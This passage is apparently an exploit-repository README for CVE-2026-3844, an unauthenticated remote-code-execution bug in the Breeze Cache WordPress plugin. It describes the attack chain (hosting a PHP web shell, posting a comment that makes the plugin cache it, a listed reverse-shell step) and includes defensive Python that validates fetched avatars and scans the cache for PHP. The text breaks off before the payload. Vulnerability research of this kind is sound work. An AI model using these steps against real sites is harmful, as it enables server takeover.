## https://sploitus.com/exploit?id=0CDEBDFC-50F8-59DC-B9F7-A7A24E92F353
# CVE-2026-3844 – Breeze Cache WordPress Plugin Unauthenticated RCE

[![CVE-2026-3844](https://img.shields.io/badge/CVE-2026--3844-critical?style=flat-square)](https://vulners.com/cve/CVE-2026-3844)
[![CVSS](https://img.shields.io/badge/CVSS-9.8%20(Critical)-red?style=flat-square)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
[![WordPress](https://img.shields.io/badge/WordPress-6.x-blue?style=flat-square)](https://wordpress.org)
[![License](https://img.shields.io/badge/License-MIT-green?style=flat-square)](LICENSE)

**CVE-2026-3844** is a critical unauthenticated arbitrary file upload vulnerability in the **Breeze Cache** WordPress plugin (versions ≤ 2.4.4). An attacker can post a comment containing a malicious `` tag pointing to a PHP web shell. The plugin fetches the remote file without validating its type and stores it in a publicly accessible cache directory (`/wp-content/cache/breeze-extra/gravatars/`), leading to **Remote Code Execution (RCE)**.

This repository provides a **fully functional Docker lab** and a **manual exploitation guide** to reproduce the vulnerability safely.

---

## 📋 Table of Contents

- [Vulnerability Overview](#-vulnerability-overview)
- [Lab Environment (Docker)](#-lab-environment-docker)
- [Exploitation Steps](#-exploitation-steps)
  - [1. Host the Payload](#1-host-the-payload)
  - [2. Post Malicious Comment](#2-post-malicious-comment)
  - [3. Verify Upload & Execute Commands](#3-verify-upload--execute-commands)
  - [4. Reverse Shell (Optional)](#4-reverse-shell-optional)
- [Mitigation & Remediation](#-mitigation--remediation)
- [Detection](#-detection)
- [References](#-references)
- [Disclaimer](#-disclaimer)

---

## 🧠 Vulnerability Overview

| Property               | Details |
|------------------------|---------|
| **CVE ID**             | CVE-2026-3844 |
| **CVSS Score**         | 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Attack Vector**      | Network – unauthenticated HTTP POST to `/wp-comments-post.php` |
| **Affected Software**  | WordPress Breeze Cache plugin ≤ 2.4.4 |
| **Patched Version**    | Breeze Cache ≥ 2.4.5 |
| **Root Cause**         | Missing file type validation in `fetch_gravatar_from_remote()` (CWE-434) |
| **Prerequisite**       | "Host Files Locally – Gravatars" option **must be enabled** in Breeze settings |
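
The root cause row above is the whole bug: a remote file is fetched and written into a web-served directory on the strength of its URL alone. The following added example (not Breeze Cache code; `validate_remote_image()`, `scan_cache_dir()`, the host allowlist and the size cap are assumptions for illustration) shows the checks a CWE-434 defence needs before caching a remote "avatar", and reuses the same byte-level check to audit an existing gravatar cache directory for files that are not images.

```python
"""Hardening and detection logic for remote-fetched avatar files.

Added example, not the plugin's own code. The helper names, the host
allowlist and the size cap are assumptions; the plugin's real internals
are not reproduced here.
"""
import os
import tempfile
from urllib.parse import urlparse

# Magic-byte signatures for the only formats an avatar endpoint should serve.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_HOSTS = {"secure.gravatar.com", "www.gravatar.com"}  # assumed allowlist
ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}
MAX_BYTES = 512 * 1024  # assumed size cap


def sniff_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for sig, kind in IMAGE_SIGNATURES.items():
        if data.startswith(sig):
            return kind
    return None


def looks_like_php(data: bytes) -> bool:
    """True if a PHP open tag appears anywhere (catches image/PHP polyglots)."""
    return b"<?php" in data or b"<?=" in data


def validate_remote_image(url: str, content_type: str, body: bytes):
    """Decide whether a fetched response may be stored in the public cache.

    Returns (ok, reason_or_extension). On success the extension comes from
    the bytes, never from the URL, so a ".php" name cannot survive.
    """
    parsed = urlparse(url)
    if parsed.scheme != "https" or (parsed.hostname or "") not in ALLOWED_HOSTS:
        return False, "source host not allowlisted"
    if content_type.split(";")[0].strip().lower() not in ALLOWED_CONTENT_TYPES:
        return False, "unexpected Content-Type"
    if len(body) > MAX_BYTES:
        return False, "response too large"
    kind = sniff_image_type(body)
    if kind is None:
        return False, "body is not a recognised image"
    if looks_like_php(body):
        return False, "embedded PHP open tag"
    return True, kind


def scan_cache_dir(path: str):
    """Detection counterpart: list cache files that are not clean images."""
    suspicious = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        with open(full, "rb") as fh:
            data = fh.read(MAX_BYTES + 1)
        if sniff_image_type(data) is None or looks_like_php(data):
            suspicious.append(name)
    return suspicious


def demo():
    """Constructed inputs: a genuine PNG header, a PHP file and a polyglot."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    php = b"<?php echo 'not an image'; ?>"
    polyglot = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8 + b"<?php /* ... */ ?>"
    avatar = "https://secure.gravatar.com/avatar/abc"      # constructed URL
    offsite = "http://untrusted.example/shell.php"          # constructed URL
    results = {
        "png": validate_remote_image(avatar, "image/png", png),
        "php": validate_remote_image(avatar, "image/png", php),
        "polyglot": validate_remote_image(avatar, "image/png", polyglot),
        "offsite": validate_remote_image(offsite, "image/png", png),
    }
    with tempfile.TemporaryDirectory() as d:
        for name, data in (("a.png", png), ("b.php", php), ("c.jpg", polyglot)):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        results["scan"] = scan_cache_dir(d)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two design points matter more than the individual checks. First, the stored extension is derived from the sniffed bytes, not from the requested URL or the `Content-Type` header, because both are attacker-controlled. Second, the polyglot check exists because a valid PNG header followed by PHP is still a valid PNG to a magic-byte sniffer; on a host where the cache directory is executable by PHP, only the open-tag check (or, better, denying script execution in that directory at the web-server level) closes the gap.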

### How It Works

1. The attacker hosts a PHP web shell (e.g., `shell.php`) on a public or local HTTP server.
2. The attacker posts a comment on any WordPress post that has comments open, with the following payload:
   ```html